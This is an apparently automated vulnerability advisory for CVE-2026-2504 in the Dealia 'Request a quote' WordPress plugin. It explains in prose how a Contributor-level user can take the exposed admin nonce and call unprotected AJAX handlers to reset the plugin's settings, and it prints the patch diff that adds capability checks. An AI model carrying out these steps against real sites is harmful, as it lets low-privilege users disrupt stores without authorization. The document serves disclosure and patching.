Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2504: Dealia – Request a quote <= 1.0.7 – Missing Authorization to Authenticated (Contributor+) Plugin Configuration Reset (dealia-request-a-quote)

CVE ID CVE-2026-2504
Plugin dealia-request-a-quote
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 1.0.7
Patched Version 1.0.8
Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2504:
The Dealia – Request a quote WordPress plugin version 1.0.7 and earlier contains a missing authorization vulnerability in multiple AJAX handlers. This allows authenticated users with Contributor-level permissions or higher to reset the plugin’s configuration and perform administrative actions.

Atomic Edge research identifies the root cause in two components. The PostsController.php file exposes the administrative nonce to users with edit_posts capability via wp_localize_script() at line 50. This nonce was previously defined as a constant DEALIA_ADMIN_NONCE in the main plugin file. The AdminSettingsController.php file contains AJAX handlers (login, create_account, reset, refresh, save_additional_settings) that verify this nonce but lack capability checks. These handlers only perform wp_verify_nonce() calls against DEALIA_ADMIN_NONCE without validating current_user_can(‘manage_options’).

Exploitation requires an authenticated attacker with at least Contributor permissions. The attacker obtains the DEALIA_ADMIN_NONCE value from the localized JavaScript variables when editing posts. They then craft POST requests to /wp-admin/admin-ajax.php with action parameters matching the vulnerable handlers: dealia_ajax_reset, dealia_ajax_login, dealia_ajax_manage_account, dealia_ajax_refresh, or dealia_save_additional_settings. Each request includes the _wpnonce parameter containing the exposed nonce value. The reset handler at AdminSettingsController.php line 426-443 is particularly impactful as it calls delete_option(‘dealia_options’), completely removing plugin configuration.

The patch in version 1.0.8 addresses the vulnerability through multiple changes. The DEALIA_ADMIN_NONCE constant is removed from dealia-request-a-quote.php. Each AJAX handler in AdminSettingsController.php now includes a capability check: if ( ! current_user_can( ‘manage_options’ ) ) { wp_send_json_error( [ ‘message’ => ‘Unauthorized’ ], 403 ); }. The nonce verification changes from DEALIA_ADMIN_NONCE to ‘dealia_admin_nonce’ created via wp_create_nonce(). The PostsController.php separates nonce usage, creating ‘dealia_post_nonce’ for post editing functions. Additional capability checks are added to FormsController.php and ProductsController.php methods.

Successful exploitation allows authenticated attackers with Contributor or higher permissions to reset the plugin configuration, potentially disrupting e-commerce functionality. Attackers can delete the dealia_options database entry, disconnect the plugin from external services, and modify integration settings. This could lead to loss of quote request functionality, broken product forms, and disruption of the WooCommerce integration. The vulnerability does not provide direct privilege escalation to WordPress administrative access but allows unauthorized modification of plugin data.

Differential between vulnerable and patched code

Code Diff 
--- a/dealia-request-a-quote/bootstrap.php
+++ b/dealia-request-a-quote/bootstrap.php
@@ -6,35 +6,35 @@
 add_action( 'admin_enqueue_scripts', 'dealia_load_css_to_admin' );

 //Admin Settings
-$admin_controller = new DealiaControllersAdminSettingsController();
+$dealia_admin_controller = new DealiaControllersAdminSettingsController();

-add_action( 'admin_menu', [$admin_controller, 'display_menu_pages'] );
-add_action( 'admin_head', [$admin_controller, 'admin_button_stylesheet'], 999);
-add_action( 'wp_ajax_dealia_ajax_manage_account', [$admin_controller, 'create_account'] );
-add_action( 'wp_ajax_dealia_ajax_login', [$admin_controller, 'login'] );
-add_action( 'wp_ajax_dealia_ajax_reset', [$admin_controller, 'reset'] );
-add_action( 'wp_ajax_dealia_ajax_refresh', [$admin_controller, 'refresh'] );
-add_action( 'wp_ajax_dealia_save_additional_settings', [$admin_controller, 'save_additional_settings'] );
+add_action( 'admin_menu', [$dealia_admin_controller, 'display_menu_pages'] );
+add_action( 'admin_head', [$dealia_admin_controller, 'admin_button_stylesheet'], 999);
+add_action( 'wp_ajax_dealia_ajax_manage_account', [$dealia_admin_controller, 'create_account'] );
+add_action( 'wp_ajax_dealia_ajax_login', [$dealia_admin_controller, 'login'] );
+add_action( 'wp_ajax_dealia_ajax_reset', [$dealia_admin_controller, 'reset'] );
+add_action( 'wp_ajax_dealia_ajax_refresh', [$dealia_admin_controller, 'refresh'] );
+add_action( 'wp_ajax_dealia_save_additional_settings', [$dealia_admin_controller, 'save_additional_settings'] );

 //Data output
-add_action( 'wp_enqueue_scripts', [$admin_controller, 'add_integration_assets'] );
-add_action( 'wp_head', [$admin_controller, 'add_integration_json'] );
+add_action( 'wp_enqueue_scripts', [$dealia_admin_controller, 'add_integration_assets'] );
+add_action( 'wp_head', [$dealia_admin_controller, 'add_integration_json'] );

-$forms_controller = new DealiaControllersFormsController();
-add_action( 'wp_ajax_dealia_get_forms', [$forms_controller, 'list_forms'] );
+$dealia_forms_controller = new DealiaControllersFormsController();
+add_action( 'wp_ajax_dealia_get_forms', [$dealia_forms_controller, 'list_forms'] );

 //Product widget
-$products_controller = new DealiaControllersProductsController();
-add_action( 'add_meta_boxes', [$products_controller, 'on_product_edit_widget'] );
-add_action( 'save_post', [$products_controller, 'manage_post_related_form'] );
+$dealia_products_controller = new DealiaControllersProductsController();
+add_action( 'add_meta_boxes', [$dealia_products_controller, 'on_product_edit_widget'] );
+add_action( 'save_post', [$dealia_products_controller, 'manage_post_related_form'] );

 //Post Gutenberg block
-$posts_controller = new DealiaControllersPostsController();
-add_action( 'admin_enqueue_scripts', [$posts_controller, 'add_legacy_post_edit_assets'] );
-add_action( 'init', [$posts_controller, 'register_block_quote_button'] );
-add_action( 'admin_footer', [$posts_controller, 'print_legacy_form'] );
-add_action( 'admin_init', [$posts_controller, 'add_legacy_editor_styles']);
+$dealia_posts_controller = new DealiaControllersPostsController();
+add_action( 'admin_enqueue_scripts', [$dealia_posts_controller, 'add_legacy_post_edit_assets'] );
+add_action( 'init', [$dealia_posts_controller, 'register_block_quote_button'] );
+add_action( 'admin_footer', [$dealia_posts_controller, 'print_legacy_form'] );
+add_action( 'admin_init', [$dealia_posts_controller, 'add_legacy_editor_styles']);

-add_action( 'wp_ajax_dealia_ajax_validate_and_print_legacy_button', [$posts_controller, 'validate_and_print_legacy_button'] );
+add_action( 'wp_ajax_dealia_ajax_validate_and_print_legacy_button', [$dealia_posts_controller, 'validate_and_print_legacy_button'] );

 dealia_modify_headers();
--- a/dealia-request-a-quote/dealia-request-a-quote.php
+++ b/dealia-request-a-quote/dealia-request-a-quote.php
@@ -7,18 +7,17 @@
  * Author:          dealia.com
  * Author URI:      https://dealia.com
  * Text Domain:     dealia-request-a-quote
- * Version:         1.0.7
+ * Version:         1.0.8
  * License:			GPLv2
  * @package         Dealia
  */

 define('DEALIA_PLUGIN_PATH', plugin_dir_path( __FILE__ ));
 define('DEALIA_PLUGIN_URL', plugin_dir_url( __FILE__ ));
-define('DEALIA_PLUGIN_VERSION', "1.0.7");
+define('DEALIA_PLUGIN_VERSION', "1.0.8");
 define('DEALIA_SITE_URL', "https://dealia.com");
 define('DEALIA_SITE_ADMIN_URL', "https://admin.dealia.com");
 define('DEALIA_API_URL', "https://jack.dealia.com");
-define('DEALIA_ADMIN_NONCE', 'nonce_Y7deR0HjpErwQn');
 define('DEALIA_DEFAULT_BUTTON_COLOR', '#1b66e7');

 require_once DEALIA_PLUGIN_PATH . '/bootstrap.php';
--- a/dealia-request-a-quote/src/Controllers/AdminSettingsController.php
+++ b/dealia-request-a-quote/src/Controllers/AdminSettingsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesCountryInfoProvider;
 use DealiaServicesDataFetcher;
 use DealiaServicesDealiaApiForms;
@@ -133,18 +135,18 @@

         $is_permalink_supported = dealia_is_permalink_type_supported();

-		View::render_echo('main-page.php', compact(
-			'options_set',
-			'access_token_set',
-			'is_woocommerce_active',
-			'hide_add_to_cart',
-			'hide_prices',
-			'forms',
-			'form_for_all_products',
-			'products_covered',
-            'countries_list',
-            'is_permalink_supported',
-		));
+		View::render_echo('main-page.php', [
+			'dealia_options_set' => $options_set,
+			'dealia_access_token_set' => $access_token_set,
+			'dealia_is_woocommerce_active' => $is_woocommerce_active,
+			'dealia_hide_add_to_cart' => $hide_add_to_cart,
+			'dealia_hide_prices' => $hide_prices,
+			'dealia_forms' => $forms,
+			'dealia_form_for_all_products' => $form_for_all_products,
+			'dealia_products_covered' => $products_covered,
+            'dealia_countries_list' => $countries_list,
+            'dealia_is_permalink_supported' => $is_permalink_supported,
+		]);
 	}

 	function menu_page_view($page = 'dashboard') {
@@ -244,10 +246,14 @@
 	}

 	function login() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING );
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
@@ -310,11 +316,14 @@
 	}

 	function create_account() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
@@ -417,9 +426,12 @@
 	}

 	public function reset() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors = [];
 			$errors[] = [
 				'field' => '_wpnonce',
@@ -433,10 +445,14 @@
 		wp_send_json_success(['redirect' => true], 201);
 	}
 	public function refresh() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
@@ -475,10 +491,14 @@
 	}

 	public function save_additional_settings() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
--- a/dealia-request-a-quote/src/Controllers/BaseController.php
+++ b/dealia-request-a-quote/src/Controllers/BaseController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if (!defined('ABSPATH')) exit;
+
 class BaseController {
 	public function __construct() {}
 }
--- a/dealia-request-a-quote/src/Controllers/FormsController.php
+++ b/dealia-request-a-quote/src/Controllers/FormsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesDealiaApiForms;

 class FormsController extends BaseController {
@@ -14,6 +16,10 @@
 	}
 	public function list_forms() {

+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		$forms = $this->forms->get_list_product_forms();

 		$result = [];
--- a/dealia-request-a-quote/src/Controllers/PostsController.php
+++ b/dealia-request-a-quote/src/Controllers/PostsController.php
@@ -7,12 +7,14 @@
 use DealiaServicesView;
 use WP_Query;

+if ( ! defined( 'ABSPATH' ) ) exit;
 class PostsController extends BaseController {

 	private $options = null;

 	private $forms = null;

+    #region public
 	public function __construct() {
 		parent::__construct();

@@ -48,7 +50,7 @@

         wp_localize_script( 'dealia_quote_button_block', 'dealia_quote_button_block_params', array(
             'ajax_url' => admin_url('admin-ajax.php'),
-            'nonce' => wp_create_nonce( DEALIA_ADMIN_NONCE ),
+            'nonce' => wp_create_nonce( 'dealia_post_nonce' ),
         ));

 		register_block_type('dealia-request-a-quote/quote-button', [
@@ -76,11 +78,19 @@
 	}

 	public function add_legacy_editor_styles() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
         add_theme_support( 'editor-styles' );
         add_editor_style( 'assets/css/dealia-integration-admin.css' );
 	}

 	public function view_quote_button_block($attributes) {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		if ( empty($attributes) || empty($attributes['form_name']) || empty($attributes['name']) ) {
 			return "";
 		}
@@ -91,7 +101,7 @@
 		$button_color = !empty($attributes['button_color']) ? $attributes['button_color'] : DEALIA_DEFAULT_BUTTON_COLOR;

 		return View::render('widgets/dealia-nonproduct-button.php', [
-			'params' => [
+			'dealia_params' => [
 				'name' => $attributes['name'],
 				'form_name' => $attributes['form_name'],
 				'image_url' => $image_url,
@@ -103,8 +113,12 @@

 	public function add_legacy_post_edit_assets($hook) {

-		if ( 'edit.php' != $hook && 'post.php' != $hook) {
-			return;
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
+		if ( !in_array($hook, ['edit.php','post.php','post-new.php'])) {
+			return false;
 		}

 		wp_enqueue_style(
@@ -122,17 +136,24 @@
 	}

 	public function print_legacy_form() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		global $pagenow;
-		if ($pagenow === 'edit.php'|| $pagenow === 'post.php') {
+		if (in_array($pagenow, ['edit.php','post.php','post-new.php'])) {
 			View::render_echo('widgets/post-edit-legacy.php');
 		}
 	}

 	public function validate_and_print_legacy_button() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

         $nonce = filter_input( INPUT_POST, 'nonce', FILTER_SANITIZE_FULL_SPECIAL_CHARS );

-        if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+        if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_post_nonce' ) ) {
             $errors[] = [
                 'field' => 'nonce',
                 'message' => 'Nonce value cannot be verified.',
@@ -181,4 +202,6 @@
 			'button' => $button,
 		], 200);
 	}
+
+    #endregion
 }
--- a/dealia-request-a-quote/src/Controllers/ProductsController.php
+++ b/dealia-request-a-quote/src/Controllers/ProductsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesDealiaApiForms;
 use DealiaServicesDealiaApiIntegration;
 use DealiaServicesDealiaApiProducts;
@@ -16,6 +18,7 @@

 	private $integration = null;

+    #region public
 	public function __construct() {
 		parent::__construct();

@@ -24,7 +27,11 @@
 		$this->forms = new Forms();
 		$this->products = new Products();
 	}
-	function on_product_edit_widget() {
+	public function on_product_edit_widget() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return;
+        }
+
 		if (!$this->options->check_all_required_set()) {
 			return;
 		}
@@ -39,7 +46,12 @@
 		);
 	}

-	function on_product_edit_widget_content ($post) {
+	public function on_product_edit_widget_content ($post) {
+
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return;
+        }
+
 		if (!$this->options->check_all_required_set()) {
 			return;
 		}
@@ -47,12 +59,12 @@
 		$forms = [];
 		$forms_response = $this->forms->get_list_product_forms();
 		$current_form = $this->check_form_assigned($post->ID);
-		$all_products_enabled = false;
+		$dealia_all_products_enabled = false;

 		if (!$current_form) {
 			$current_form = $this->check_form_assigned_globally();
 			if ($current_form) {
-				$all_products_enabled = true;
+				$dealia_all_products_enabled = true;
 			}
 		}

@@ -63,44 +75,13 @@
         $is_permalink_supported = dealia_is_permalink_type_supported();

 		View::render_echo('widgets/product-edit-widget.php', [
-			'forms' => $forms,
-			'current_form' => $current_form,
-			'all_products_enabled' => $all_products_enabled,
-            'is_permalink_supported' => $is_permalink_supported,
+			'dealia_forms' => $forms,
+			'dealia_current_form' => $current_form,
+			'dealia_all_products_enabled' => $dealia_all_products_enabled,
+            'dealia_is_permalink_supported' => $is_permalink_supported,
 		]);
 	}

-	function get($post_id) {
-		if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
-			return false;
-		}
-
-		if (!$this->options->check_all_required_set()) {
-			return false;
-		}
-
-		$parent_id = wp_is_post_revision( $post_id );
-
-		if ( false !== $parent_id ) {
-			$post_id = $parent_id;
-		}
-
-		$post = get_post( $post_id );
-		$post_name = $post->post_name;
-
-		try {
-			$search_for_product_results = $this->products->get_by_url($post_name);
-		} catch (Exception $exception) {
-			$search_for_product_results = $this->products->default_request_error_output();
-		}
-
-		if ($search_for_product_results['success'] && !empty($search_for_product_results['data'])) {
-			return $search_for_product_results['data'][0];
-		}
-
-		return false;
-	}
-
 	public function check_form_assigned_globally() {
 		$company_settings = $this->integration->get_company_raw_settings();
 		$form_id = false;
@@ -116,21 +97,11 @@
 		return $form_id;
 	}

-	public function check_form_assigned($post_id) {
-		$product = $this->get($post_id);
+	public function manage_post_related_form($post_id) {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }

-		if (!$product) {
-			return false;
-		}
-
-		if (!is_array($product) || empty($product['form_id'])) {
-			return false;
-		}
-
-		return $product['form_id'];
-	}
-
-	function manage_post_related_form($post_id) {
 		if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
 			return false;
 		}
@@ -160,15 +131,63 @@
 			return false;
 		}

-		$all_products_enabled = (!empty($dealia_app_products_enabled) && 1 === (int) $dealia_app_products_enabled );
+		$dealia_all_products_enabled = (!empty($dealia_app_products_enabled) && 1 === (int) $dealia_app_products_enabled );

-		if ($all_products_enabled || (!$all_products_enabled && $dealia_is_active)) {
+		if ($dealia_all_products_enabled || (!$dealia_all_products_enabled && $dealia_is_active)) {
 			return $this->assign_form_to_post($post_id, $dealia_form_id);
 		} else {
 			return $this->unassign_form_from_post($post_id);
 		}
 	}

+    #endregion
+
+    #region private
+
+    private function check_form_assigned($post_id) {
+        $product = $this->get($post_id);
+
+        if (!$product) {
+            return false;
+        }
+
+        if (!is_array($product) || empty($product['form_id'])) {
+            return false;
+        }
+
+        return $product['form_id'];
+    }
+    private function get($post_id) {
+
+        if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
+            return false;
+        }
+
+        if (!$this->options->check_all_required_set()) {
+            return false;
+        }
+
+        $parent_id = wp_is_post_revision( $post_id );
+
+        if ( false !== $parent_id ) {
+            $post_id = $parent_id;
+        }
+
+        $post = get_post( $post_id );
+        $post_name = $post->post_name;
+
+        try {
+            $search_for_product_results = $this->products->get_by_url($post_name);
+        } catch (Exception $exception) {
+            $search_for_product_results = $this->products->default_request_error_output();
+        }
+
+        if ($search_for_product_results['success'] && !empty($search_for_product_results['data'])) {
+            return $search_for_product_results['data'][0];
+        }
+
+        return false;
+    }
 	private function assign_form_to_post($post_id, $form_id) {
 		try {
 			$product_to_update = $this->get($post_id);
@@ -223,6 +242,7 @@
 		}

 		return true;
-
 	}
+
+    #endregion
 }
--- a/dealia-request-a-quote/src/Library/ApiRequest.php
+++ b/dealia-request-a-quote/src/Library/ApiRequest.php
@@ -2,6 +2,8 @@

 namespace DealiaLibrary;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesOptions;
 use Exception;
 use WP_Error;
@@ -68,19 +70,10 @@

 			$response = wp_remote_request( $url, $request_params );

-//print_r($response );
-//exit;
-
 		} catch ( Exception $exception ) {

 			self::increase_attempts();

-			$message = implode(" ", [
-				__CLASS__ . "::request : ",
-				"Code " . $exception->getCode() . ";",
-				$exception->getMessage(),
-			]);
-
 			return array(
 				'code' => 500,
 				'messages' => array('Request error'),
@@ -98,14 +91,6 @@
 			$body = $response['body'];
 		}

-		$request_log_message = implode(" ", [
-			gmdate("Y-m-d H:i:s"),
-			"Request : " . $type ."|". $action . " ;",
-			"Data: " . wp_json_encode($data) ." ;",
-			"Params: " . wp_json_encode($params) ." ;",
-			"Response: " . $body . " ;",
-		]);
-
 		return json_decode( $body, true);
 	}

--- a/dealia-request-a-quote/src/Services/CountryInfoProvider.php
+++ b/dealia-request-a-quote/src/Services/CountryInfoProvider.php
@@ -2,12 +2,14 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class CountryInfoProvider extends Service {

     public function getByCountryCode($countryCode) {
         $countries = $this->getList();
         if (!isset($countries[$countryCode])) {
-            throw new Exception("Country Code $countryCode does not exist");
+            throw new Exception(esc_html__("Country Code does not exist", "dealia-request-a-quote"));
         }
         return $countries[$countryCode];
     }
--- a/dealia-request-a-quote/src/Services/DataFetcher.php
+++ b/dealia-request-a-quote/src/Services/DataFetcher.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class DataFetcher extends Service {
 	public function handle_custom_query_var( $query, $query_vars ) {
 		if ( isset( $query_vars['like_name'] ) && !empty( $query_vars['like_name'] ) ) {
--- a/dealia-request-a-quote/src/Services/DealiaApi/ApiService.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/ApiService.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaLibraryApiRequest;
 use DealiaServicesOptions;
 use DealiaServicesService;
--- a/dealia-request-a-quote/src/Services/DealiaApi/Forms.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Forms.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaLibraryApiRequest;

 class Forms extends ApiService {
@@ -21,7 +23,6 @@

 		try {
 			$forms = $this->make_get_request('/catalog/forms/list',[
-				//'limit' => 1,
 				'offset' => 0,
 			]);
 		} catch (Exception $exception) {
--- a/dealia-request-a-quote/src/Services/DealiaApi/Integration.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Integration.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use stdClass;

 class Integration extends ApiService {
--- a/dealia-request-a-quote/src/Services/DealiaApi/Products.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Products.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class Products extends ApiService {

 	public function __construct() {
--- a/dealia-request-a-quote/src/Services/Options.php
+++ b/dealia-request-a-quote/src/Services/Options.php
@@ -2,6 +2,7 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
 class Options extends Service {
 	const DEALIA_OPTIONS_KEY = 'dealia_options';
 	private $required_options_keys = [
--- a/dealia-request-a-quote/src/Services/Service.php
+++ b/dealia-request-a-quote/src/Services/Service.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if (!defined('ABSPATH')) exit;
+
 abstract class Service {

 }
--- a/dealia-request-a-quote/src/Services/View.php
+++ b/dealia-request-a-quote/src/Services/View.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class View extends Service {
 	public static function render($template_path, $params = array(), $allowed_keys = array(), $prefix = "")
 	{
--- a/dealia-request-a-quote/templates/footer/part-woocommerce.php
+++ b/dealia-request-a-quote/templates/footer/part-woocommerce.php
@@ -1,19 +1,18 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-$options_set           = ( ! empty( $options_set ) ? $options_set : false );
-$access_token_set      = ( ! empty( $access_token_set ) ? $access_token_set : false );
-$is_woocommerce_active = ( ! empty( $is_woocommerce_active ) ? $is_woocommerce_active : false );
-$hide_add_to_cart      = ( ! empty( $hide_add_to_cart ) ? $hide_add_to_cart : false );
-$hide_prices           = ( ! empty( $hide_prices ) ? $hide_prices : false );
-$forms                 = ( ! empty( $forms ) ? $forms : array() );
+<?php if ( ! defined( 'ABSPATH' ) ) exit;
+
+$dealia_options_set           = ( ! empty( $dealia_options_set ) ? $dealia_options_set : false );
+$dealia_access_token_set      = ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false );
+$dealia_is_woocommerce_active = ( ! empty( $dealia_is_woocommerce_active ) ? $dealia_is_woocommerce_active : false );
+$dealia_hide_add_to_cart      = ( ! empty( $dealia_hide_add_to_cart ) ? $dealia_hide_add_to_cart : false );
+$dealia_hide_prices           = ( ! empty( $dealia_hide_prices ) ? $dealia_hide_prices : false );
+$dealia_forms                 = ( ! empty( $dealia_forms ) ? $dealia_forms : array() );
 ?>

 <div class="d-icons woo-ico-d"></div>
 <h3><?php esc_attr_e( 'Settings for WooCommerce', 'dealia-request-a-quote' ); ?></h3>

-<?php if ( $is_woocommerce_active ): ?>
-	<?php if ( ! $options_set || ! $access_token_set ): ?>
+<?php if ( $dealia_is_woocommerce_active ): ?>
+	<?php if ( ! $dealia_options_set || ! $dealia_access_token_set ): ?>
         <p><?php esc_attr_e( 'Your Dealia account is not set up yet. Please connect it to get started.', 'dealia-request-a-quote' ); ?></p>
 	<?php else: ?>
         <p><?php esc_attr_e( 'Please configure options for your store:', 'dealia-request-a-quote' ); ?></p>
@@ -31,7 +30,7 @@
                                 placeholder=""
                                 class="text-input dealia-form-input"
                                 value="all"
-							<?php if ( ! empty( $products_covered ) && $products_covered === 'all' ): ?> checked <?php endif; ?>
+							<?php if ( ! empty( $dealia_products_covered ) && $dealia_products_covered === 'all' ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-all-products" class="dealia-field-label">
 							<?php esc_attr_e( 'All products', 'dealia-request-a-quote' ); ?>
@@ -40,16 +39,16 @@

                     <div
                             id="dealia-forms-block"
-                            class="<?php if ( empty( $products_covered ) || $products_covered !== 'all' ): ?> dealia-hidden <?php endif; ?>"
+                            class="<?php if ( empty( $dealia_products_covered ) || $dealia_products_covered !== 'all' ): ?> dealia-hidden <?php endif; ?>"
                     >

                         <label for="dealia-forms" class="dealia-field-label">Form:</label>
                         <select id="dealia-forms" name="form_for_all_products">
-							<?php foreach ( $forms as $form ): ?>
+							<?php foreach ( $dealia_forms as $dealia_form ): ?>
                                 <option
-									<?php if ( ! empty( $form_for_all_products ) && $form_for_all_products === $form['value'] ): ?> selected <?php endif; ?>
-                                        value="<?php dealia_escape_echo( $form['value'] ); ?>">
-									<?php dealia_escape_echo( $form['label'] ); ?>
+									<?php if ( ! empty( $dealia_form_for_all_products ) && $dealia_form_for_all_products === $dealia_form['value'] ): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_form['value'] ); ?>">
+									<?php dealia_escape_echo( $dealia_form['label'] ); ?>
                                 </option>
 							<?php endforeach; ?>
                         </select>
@@ -63,7 +62,7 @@
                                 placeholder=""
                                 class="text-input dealia-form-input"
                                 value="selected"
-							<?php if ( ! empty( $products_covered ) && $products_covered === 'selected' ): ?> checked <?php endif; ?>
+							<?php if ( ! empty( $dealia_products_covered ) && $dealia_products_covered === 'selected' ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-selected-products" class="dealia-field-label">
 							<?php esc_attr_e( 'Selected products', 'dealia-request-a-quote' ); ?>
@@ -82,7 +81,7 @@
                                 name="hide_addtocart"
                                 placeholder=""
                                 class="text-input dealia-form-input"
-							<?php if ( $hide_add_to_cart ): ?> checked <?php endif; ?>
+							<?php if ( $dealia_hide_add_to_cart ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-hide-addtocart" class="dealia-field-label">
 							<?php esc_attr_e( 'Hide "Add to Cart" button', 'dealia-request-a-quote' ); ?>
@@ -95,7 +94,7 @@
                                 name="hide_price"
                                 placeholder=""
                                 class="text-input dealia-form-input"
-							<?php if ( $hide_prices ): ?> checked <?php endif; ?>
+							<?php if ( $dealia_hide_prices ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-hide-price" class="dealia-field-label">
 							<?php esc_attr_e( 'Hide prices', 'dealia-request-a-quote' ); ?>
--- a/dealia-request-a-quote/templates/footer/part-wordpress.php
+++ b/dealia-request-a-quote/templates/footer/part-wordpress.php
@@ -1,6 +1,5 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-} ?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <h1 class="white-text-d"><?php esc_attr_e( 'Dealia for Wordpress', 'dealia-request-a-quote' ); ?></h1>
 <div>
     <div class="white-text-d"><p>Add the “Request a Quote” Button to Your WordPress Pages & Posts.</p>
--- a/dealia-request-a-quote/templates/generic-iframe-page.php
+++ b/dealia-request-a-quote/templates/generic-iframe-page.php
@@ -1,15 +1,15 @@
 <?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) exit;

